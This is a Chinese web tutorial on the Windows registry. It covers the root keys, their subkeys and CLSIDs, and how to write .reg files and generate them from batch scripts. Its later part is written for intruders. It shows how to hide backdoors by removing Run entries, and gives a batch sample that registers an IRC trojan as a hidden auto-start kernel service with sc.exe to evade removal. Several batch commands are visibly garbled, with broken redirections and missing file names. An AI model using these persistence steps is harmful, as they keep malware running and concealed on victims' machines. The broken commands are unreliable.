注册表包括以下的5个主要键项:
1.HKDY_CLASSES_ROOT:包含启动应用程序所需的全部信息,包括扩展名、应用程序与文档之间的关系、驱动程序名、DDE和OLE信息,类ID编号和应用程序与文档的图标等。
2.HKEY_CURRENT_USER:包含当前登录用户的配置信息,包括环境变量、个人程序、桌面设置等。
3.HKEY_LOCAL_MACHINE:包含本地计算机的系统信息,包括硬件和操作系统信息,如设备驱动程序,安全数据和计算机专用的各类软件设置信息。
4.HKEY_USERS:包含计算机的所有用户使用的配置数据,这些数据只有在用户登录在系统上时方能访问。这些信息告诉系统当前用户使用的图标、激活的程序组、开始菜单的内容以及颜、字体等。
5.HKEY_CURRENT_CONFIG:存放当前硬件的配置信息,其中的信息是从HKEY_LOCAL_MACHINE中映射出来的。
具体的说明请见如下的介绍:
一、HKEY_CLASSES_ROOT根键
HKEY_CLASSES_ROOT根键中记录的是Windows操作系统中所有数据文件的信息内容,主要记录了不同的文件的文件名后缀和与之对应的应用程序。当用户双击一个文档时,系统可以通过这些信息启动相应的应用程序。
HKEY_CLASSES_ROOT根键是由多个子键组成的,可分为两种:一种是已经注册的各类文件的扩展名,另一种是各种文件类型的有关信息。由于该根键包含的子键数目最多,下面就用Avifile子键简要介绍它下面的子键的含义:
1.CLSID子键
Avifile子键下的第一个子键是“CLSID”,即“分类标识”,在选中它时可以看到其默认的键值。Windows系统可用这个类标识号来识别相同类型的文件。在HKEY_CLASSES_ROOT主键下也有一个子键“CLSID”,其中包含了所有注册文件的类标识。
2.Compressors 子键
这个分支下面的两个子键auds和vids分别给出了音频和视频数据压缩程序的类标识,通过这些类标识可出相应的处理程序,
(1) auds 子键
该子键位于HKEY_CLASSES_ROOTavifileCompressorsauds分支中,用于设置音频数据压缩程序的类标识。
(2) vids子键
该子键位于HKEY_CLASSES_ROOTavifileCompressorsvids分支上,用于设置视频数据压缩程序的类标识。
3.DefaultIcon 子键
该子键用于设置avifile的缺省图标。
4.RIFFHandlers子键
该子键用于设置RIFF文件的句柄。在该子键下包含了AVI和WAVE两个文件的类标识。
(1) AVI子键
这个子键位于HKEY_CLASSES_ROOTavifileRIFFHandlersAVI分支上,用于设置AVI文件的类标识。
(2) WAVE子键
该子键位于HKEY_CLASSES_ROOTavifileRIFFHandlersWAVE分支上,用于设置WAVE文件的类标识。
5.protocol子键
该
分支下的子键中包含了执行程序和编辑程序的路径和文件名,
(1) StdExecute子键
该子键具有如下子键结构:
HKEY_CLASSES_ROOTavifileprotocolStdExecuteServer,它用于指定avifile的标准执行程序。
(2) StdFileEditing子键
该子键位于HKEY_CLASSES_ROOTavifileprotocolStdFileEditing分支上,用于设置标准文件编辑程序。
在这个子键下面有三个子键:
①Server子键
该子键位于HKEY_CLASSES_ROOTavifileprotocolStdFileEditingServer分支上,用于指定编辑程序。
②PackageObjects子键
该子键位于HKEY_CLASSES_ROOTavifileprotocolStdFileEditing
PackageObjects分支上,用于指定打开avifile的包对象编辑程序。
③verb子键
该子键位于HKEY_CLASSES_ROOTavifileprotocolStdFileEditingverb分支上,用于设置打开标准avi文件编辑程序时的工作状态。
另外,还有“Handler”和“Handlers”两个子键。
6.Shell 子键
该子键位于HKEY_CLASSES_ROOTavifileShell分支上,用于设置视频文件的外壳。
(1) Open子键
该子键具有如下子键结构:
HKEY_CLASSES_ROOTavifileShellOpenCommand
它用于设置“打开”avi文件的程序。
(2) Play子键
该子键具有如下子键结构:
HKEY_CLASSES_ROOTavifileShellPlayCommand,该键指定用于“播放”命令的程序。
7.shellex子键
该子键位于HKEY_CLASSES_ROOTavifileshellex分支上。该分支的子键中包含了视频文件的外壳扩展,在该子键下面有一个PropertySheetHandlers子键,用于设置“视频文件属性页”(Avi Page)的文件句柄。在PropertySheetHandlers 子键下面还有一个AviPage 子键,用于设置AviPage的类标识。
二、HKEY_CURRENT_USER根键
HKEY_CURRENT_USER根键中保存的信息(当前用户的子键信息)与HKEY_USERS.Default分支中所
保存的信息是一样的。任何对HKEY_CURRENT_USER根键中的信息的修改都会导致对HKEY_USERS.Default中子键信息的修改。
三、KEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE根键中存放的是用来控制系统和软件的设置。由于这些设置是针对那些使用Windows系统的用户而设置的,是一个公共配置信息,所以它与具体用户没有多大关系。这个根键下面包含了五个子键:
1.HARDWARE子键
该子键包含了系统使用的浮点处理器、串口等有关信息。在它下面存放一些有关超文本终端、数字协处理器和串口等信息。HARDWARE子键又包括三个子键:
DESCRIPTION:用于存放有关系统信息;
DEVICEMAP:用于存放设备映像;
RESOURCEMAP;
2.SAM子键
该子键已经被系统保护起来,不可能看到里面的内容。
3.SECURITY子键
这个子键位于HKEY_LOCAL_MACHINESecurity分支上,该分支只是为将来的高级功能而预留的。
4.SOFTWARE子键
这个子键中保留的是所有已安装的32位应用程序的信息。各个程序的控制信息分别安装在相应的子键中。由于不同的机器安装的应用程序互不相同,因此这个子键下面的子键信息会有很大的差异。
5.SYSTEM子键
该子键存放的是启动时所使用的信息和修复系统时所需的信息,其中包括各个驱动程序的描述信息和配置信息等。System子键下面有一个CurrentControlSet子键,系统在这个子键下保存了当前的驱动程序控制集的所有信息。
四、HKEY_USERS根键
HKEY_USERS根键中保存的是默认用户(.DEFAULT)、当前登录用户与软件(Software)的信息。它的下
面有三个子键:.DEFAULT子键、S-1-5-21-1229272821-436374067-1060284298-1000和S-1-5-21-1229272821-436374069-1060284298-1000_Classes三个子键,其中最重要的是.DEFAULT子键。
.DEFAULT子键的配置是针对未来将会被创建的新用户的。新用户根据默认用户的配置信息来生成自己的配置文件,该配置文件包括环境、屏幕、声音等多种信息。
.DEFAULT下有九个子键,介绍其中的几个:
1.AppEvents子键
它包含了各种应用事件(包括事件名称、描述以及各种系统功能的声音)的列表。其下面又包含两个子键EventLabels(按字母顺序列表)和Schemes(按事件分类列表)。
2.Control Panel子键
它所包含的内容与桌面、光标、键盘和鼠标等设置有关。改变它们的键值就将改变对应的工作环境或参数。
3.keyboard layout子键
该子键位于HKEY_USERS.DEFAULTkeyboard layout分支上,用于设置键盘的布局,如键盘语言的加载顺序等。该子键下面提供有如下三个子键:
preload子键
(1)该子键位于HKEY_USERS.DEFAULTkeyboard layoutpreload分支上,用于设置键盘语言的加载次序。Preload子键下面的子键个数与系统中所安装的键盘语言有关。
(2)Substitutes子键
该子键位于HKEY_USERS.DEFAULTkeyboard layoutsubstitutes分支,用于设置可替换的键盘语言布局。在通常情况下,此子键的设置是空的。
(3)Toggle子键
该子键位于HKEY_USERS.DEFAULTkeyboard layouttoggle分支上,用于选择键盘语言。
五、HKEY_CURRENT_CONFIG根键
如果你在Windows中设置了两套或者两套以上的硬件配置文件(Hardware Configuration file),则在系统
启动时将会让用户选择使用哪套配置文件。而HKEY_CURRENT_CONFIG根键中存放的正是当前配置文件的信息。
六、注册表文件位置
Windows 2000/XP注册表文件存储于“WINNT\system32\config
”文件夹,其中包括“Default”、“SAM”、“Security”(Windows 2000无此文件)、“Software”和“System”五个文件。
例如:
HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D} 控制面板
HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48} 拨号网络
HKEY_CLASSES_ROOT\CLSID\{BFB23B42-E3F0-101B-8488-00AA003E56F8} 浏览器
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D} 我的电脑
HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D} 网上邻居
HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D} 打印机
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F984E} 回收站
HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF} 计划任务
HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103} 我的文档
HKEY_CLASSES_ROOT\CLSID\{FF393560-C2A7-11CF-BFF4-444553540000} URL历史
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command 默认键值设为:
"C:\Program Files\Internet " www.qq 这样打开IE就指向QQ网,但主页不变
【制作注册表导入文件】
首先你得明白什么样的文件可以导入注册表 ,一般情况下
第一行是 REGEDIT4 或是 Windows Registry Editor Version 5.00
第二行 空掉
以下开始方括号中些下注册表路径
下行写键和键值
例:
@ 回显屏蔽
%SystemRoot% 表示系统目录
删除自己可以使用语句 del %0
如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
do
or的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,
记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>&
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&
@echo "Invader"="Ex4rch">&
@echo "door"=5>>C:\\WINNT\\system32\\>&
@echo "Autodos"=dword:02>&
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为)
@
@attrib +h +
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
视频文件修复@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
【修改注册表项】
《开始菜单及相关设置》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsMenu"=dword:00000001(隐藏开始->文档菜单)
"NoRecentDocsHistory"=dword:00000001(禁止将打开的文档存入历史记录)
"ClearRecentDocsOnExit"=dword:00000001(退出系统自
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论